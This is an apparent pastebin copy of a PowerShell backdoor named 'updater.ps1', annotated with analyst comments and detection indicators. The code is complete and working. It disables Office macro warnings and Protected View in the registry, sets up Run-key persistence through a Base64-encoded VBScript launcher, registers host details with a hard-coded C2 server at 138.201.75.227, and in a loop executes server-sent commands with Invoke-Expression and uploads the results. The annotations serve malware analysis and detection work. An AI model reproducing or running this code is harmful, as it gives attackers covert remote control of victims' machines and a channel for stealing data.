
updater.ps1

opexxx Mar 9th, 2017 (edited) 265 Never
  # Analyst note: staging section. It relaxes Office macro and Protected View
  # settings for the current user, registers a per-user logon autostart entry,
  # and writes the VBScript launcher that the autostart entry points at.
  #
  # An Excel COM instance is created and its version read. Neither variable is
  # referenced again in this listing and no Quit() call is visible, so the
  # COM-started Excel process presumably stays resident.
  1. $Excel = New-Object -ComObject Excel.Application
  2. $ExcelVersion = $Excel.Version
  # Excel, Office version keys 10.0 through 20.0 under HKCU:
  #   AccessVBOM = 1   -> trusts programmatic access to the VBA project model
  #   VBAWarnings = 1  -> macros run without a prompt
  #   Disable*InPV = 1 -> Protected View off for attachments, internet-origin
  #                       files and unsafe locations
  # Detection: a script host writing these value names under
  # HKCU\Software\Microsoft\Office\<ver>\excel\Security is a strong signal;
  # policy-enforced values under the Policies hive take precedence over them.
  3. for($i=10; $i -le 20; $i++){
  4. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force
  5. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force
  6. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
  7. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
  8. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
  9. }
  # Same five values, written for Word.
  10. for($i=10; $i -le 20; $i++){
  11. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force
  12. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force
  13. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
  14. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
  15. New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
  16. }
  # Persistence: per-user Run value named "Updater" whose data is the path of
  # a .vbs file in the world-writable Public\Documents folder. Triage: review
  # HKCU\...\CurrentVersion\Run for values that point at script files.
  17. New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Updater -PropertyType String -Value 'C:\Users\Public\Documents\conf.vbs' -Force
  # $x is Base64. It decodes to a short VBScript that creates WScript.Shell and
  # runs powershell.exe with -WindowStyle hidden -ExecutionPolicy Bypass
  # -nologo -noprofile -file C:\Users\Public\Documents\Updater.ps1, window
  # style 0. The decoded text is written to conf.vbs, the Run-key target above.
  18. $x='RGltIG9ialNoZWxsClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKY29tbWFuZCA9ICJwb3dlcnNoZWxsLmV4ZSAtV2luZG93U3R5bGUgaGlkZGVuIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1ub2xvZ28gLW5vcHJvZmlsZSAtZmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXFVwZGF0ZXIucHMxIgpvYmpTaGVsbC5SdW4gY29tbWFuZCwwClNldCBvYmpTaGVsbCA9IE5vdGhpbmcK'
  19. [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x)) | Out-File C:\Users\Public\Documents\conf.vbs
  20.  
  # Hard-coded settings read by the functions below:
  #   api         - base URL of the remote server; plain HTTP to an IP literal,
  #                 so requests and replies are visible to network monitoring
  #   storagePath - folder that holds the per-user "<username>.key" file
  #   chunkSize   - maximum characters of result data per request
  #   retryCount  - failed chunk sends tolerated before an upload is abandoned
  # Indicators: the address 138.201.75.227 with URL path /v2/, and files
  # created in C:\Users\Public\Documents.
  21. $config = @{'api'= 'http://138.201.75.227/v2/'; 'storagePath'= 'C:\Users\Public\Documents'; 'chunkSize'=1024; 'retryCount'=2}
  # encode: returns the Base64 form of $text's UTF-8 bytes.
  # Used below on the registration data and on command output, so outbound
  # values appear in URLs as Base64, which is an encoding and not encryption.
  22. function encode
  23. {
  24.     param([string] $text)
  25.     $bytes = [System.Text.Encoding]::UTF8.GetBytes($text)
  26.     [Convert]::ToBase64String($bytes)
  27. }
  28.  
  # decode: inverse of encode. Base64-decodes $code and returns the bytes
  # read as UTF-8 text. getCommand uses it on the command field it receives.
  29. function decode
  30. {
  31.     param([string] $code)
  32.     [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code))
  33. }
  34.  
  35.  
  # getIps: host-fingerprinting helper. Returns the first IP address of every
  # IP-enabled network adapter, joined with "-".
  36. function getIps
  37. {
  38.     $ips=""
  # WMI query for IP-enabled adapters. Adapters whose first address matches
  # '169*' are skipped, then "-<address>" is appended for each remaining one.
  39.     gwmi Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | where{$_.IPAddress[0] -NotLike '169*'} | % {$ips = $ips + "-"+ $_.IPAddress[0]}
  # Drops the leading "-" separator.
  40.     return $ips.subString(1)
  41. }
  42.  
  # eval: runs $expression through Invoke-Expression and returns $false when a
  # System.SystemException is caught.
  # Analyst note: getCommand passes the decoded server reply to this function,
  # so it is the point where remotely supplied text executes with the logged-on
  # user's rights. PowerShell script block logging (event ID 4104) records the
  # text that is executed here.
  43. function eval
  44. {
  45.     param([string] $expression)
  46.     try {
  47.         Invoke-Expression $expression
  48.     } catch [System.SystemException] {
  49.         return $false
  50.     }
  51. }
  52.  
  # httpGet: issues an HTTP GET for $config['api'] followed by $url and returns
  # the response body as a string. On a Net.WebException it returns the
  # exception message instead, so callers cannot distinguish an error message
  # from a server reply by type alone.
  # Detection: every request is a GET to the same base URL with an
  # "?action=..." query string. Traffic is unencrypted HTTP, so proxy and
  # NetFlow logs show the full URL.
  53. function httpGet
  54. {
  55.     param([string] $url)
  56.     try {
  57.         return (New-Object System.Net.WebClient).DownloadString("$($config['api'])$($url)")
  58.     }
  59.     catch [Net.WebException] {
  60.         return $_.Exception.Message
  61.     }
  62. }
  63.  
  # sendResult: uploads $result (already Base64 when called from getCommand)
  # for command $cmdId under client id $key, via GET requests with
  # action=saveResult.
  # Detection: the payload travels in the URL query string, so web proxy logs
  # show long Base64 "res=" values, with "chunk=<n>" and "chunk=last" markers
  # when the data exceeds one chunk.
  64. function sendResult
  65. {
  66.     param([string] $key, [string] $cmdId, [string]$result)
  67.     $prefix = "?action=saveResult&id=$key&cmd=$cmdId"
  # Number of whole chunkSize pieces; 0 means the result fits in one request.
  68.     $chunks = [math]::floor($result.Length / $config['chunkSize'])
  69.     if($chunks -eq 0){
  70.         httpGet "$prefix&res=$result"
  71.     }else{
  # $counter counts failed sends across the whole upload; it is not reset
  # after a chunk succeeds.
  72.         $counter = 0;
  73.         for($j=0; $j -le $chunks; ++$j){
  74.             $httpResult=''
  75.             if($j -eq $chunks){
  # Final piece: the remainder of the string, tagged chunk=last.
  76.                 $chunk = $result.Substring($j*$config['chunkSize'])
  77.                 $httpResult = httpGet "$prefix&chunk=last&res=$chunk"
  78.             }else{
  79.                 $chunk = $result.Substring($j*$config['chunkSize'],$config['chunkSize'])
  80.                 $httpResult = httpGet "$prefix&chunk=$j&res=$chunk"
  81.             }
  # The server acknowledges a chunk with the literal body 'OK'.
  82.             if($httpResult -eq 'OK'){continue}
  # Any other reply: count the failure and step $j back so the loop's ++$j
  # resends the same chunk. The upload stops once retryCount failures are
  # reached; otherwise it waits 5 seconds before the resend.
  83.             ++$counter
  84.             --$j
  85.             if($counter -ge $config['retryCount']){break}
  86.             Start-Sleep -s 5
  87.         }
  88.     }
  89. }
  90.  
  # getKey: returns this client's numeric id, registering with the server when
  # no valid id is stored locally. Returns $false if registration does not
  # yield an all-digit id.
  # Forensic artefact: "<storagePath>\<username>.key" holding only digits.
  # Network artefact: a GET with "?action=register&data=<Base64>".
  91. function getKey
  92. {
  93.     $keyPath = "$($config['storagePath'])\$($env:username).key"
  # Reuse a previously stored id if the file exists and contains only digits.
  94.     if((Test-Path $keyPath) -eq $true){
  95.         $key = Get-Content $keyPath
  96.         if($key -match "^\d+$"){
  97.             return $key
  98.         }
  99.     }
  # Host profile sent at registration: OS architecture, OS version and the
  # first two fields of the Win32_OperatingSystem Name value, joined with "|".
  # NOTE(review): how the '{|}' separator argument is interpreted depends on
  # which String.Split overload PowerShell binds - confirm on the target runtime.
  100.     $os = (Get-WmiObject Win32_OperatingSystem).Name
  101.     $os = $os.Split('{|}', [System.StringSplitOptions]::RemoveEmptyEntries)
  102.     $os ="$((Get-WmiObject Win32_OperatingSystem).OSArchitecture)|$((Get-WmiObject Win32_OperatingSystem).Version)|$($os[0])|$($os[1])"
  # Registration record: computer name, user name, OS profile and IP list,
  # separated by "::" and then Base64-encoded.
  103.     $data = "$($env:computername)::$($env:username)::$($os)::$(getIPs)"
  104.     $data = encode $data
  105.     $id = httpGet "?action=register&data=$($data)"
  # Only an all-digit reply is accepted as an id and written to the key file.
  106.     if($id.Length -gt 0){
  107.         if($id -match "^\d+$"){
  108.             Set-Content $keyPath $id
  109.             return $id
  110.         }
  111.     }
  112.     return $false
  113. }
  114.  
  # getCommand: one polling cycle. Requests a task for client id $key, executes
  # it, and uploads the output. Returns $true when a reply was processed and
  # $false when the reply is 4 characters or shorter.
  # Analyst note: this is the remote-execution path. The reply is not
  # authenticated or signed anywhere in this listing, and it arrives over plain
  # HTTP, so the task text is recoverable from a packet capture.
  115. function getCommand($key)
  116. {
  117.     $commands = httpGet -url "?action=getCommand&id=$key"
  118.     if($commands.Length -gt 4){
  # Reply layout as parsed here: <command id> and <Base64 command>, split on
  # the '{::}' separator argument.
  119.         $parts = $commands.Split('{::}', [System.StringSplitOptions]::RemoveEmptyEntries)
  120.         $id = $parts[0]
  121.         $cmd = decode $parts[1]
  # Execute the decoded text and capture its output as one string.
  122.         $res = ((eval $cmd) | Out-String)
  # Shrink the output before upload: runs of 4 or more spaces become 4 spaces,
  # runs of 4 or more dashes become '----'.
  123.         $res = $res -replace ' {4,}', '    '
  124.         $res = $res -replace '\-{4,}', '----'
  125.         $res = encode $res
  126.         sendResult $key $id $res
  127.         return $true
  128.     }
  129.     return $false
  130. }
  131.  
  132.  
  # Main loop, phase 1: retry getKey every 120 seconds until it returns an id.
  133. while($true){
  134. $key = getKey
  135. if($key -eq $false){start-sleep -Seconds 120}
  136. else{break}
  137. }
  # Phase 2: poll for a task every 120 seconds, with no exit condition.
  # Detection: a fixed two-minute interval of GET requests carrying
  # "action=getCommand" to the same host is a regular beacon pattern that
  # proxy or flow analytics can surface.
  138. while ($true){
  139.     getCommand $key
  140.     start-sleep -Seconds 120
  141. }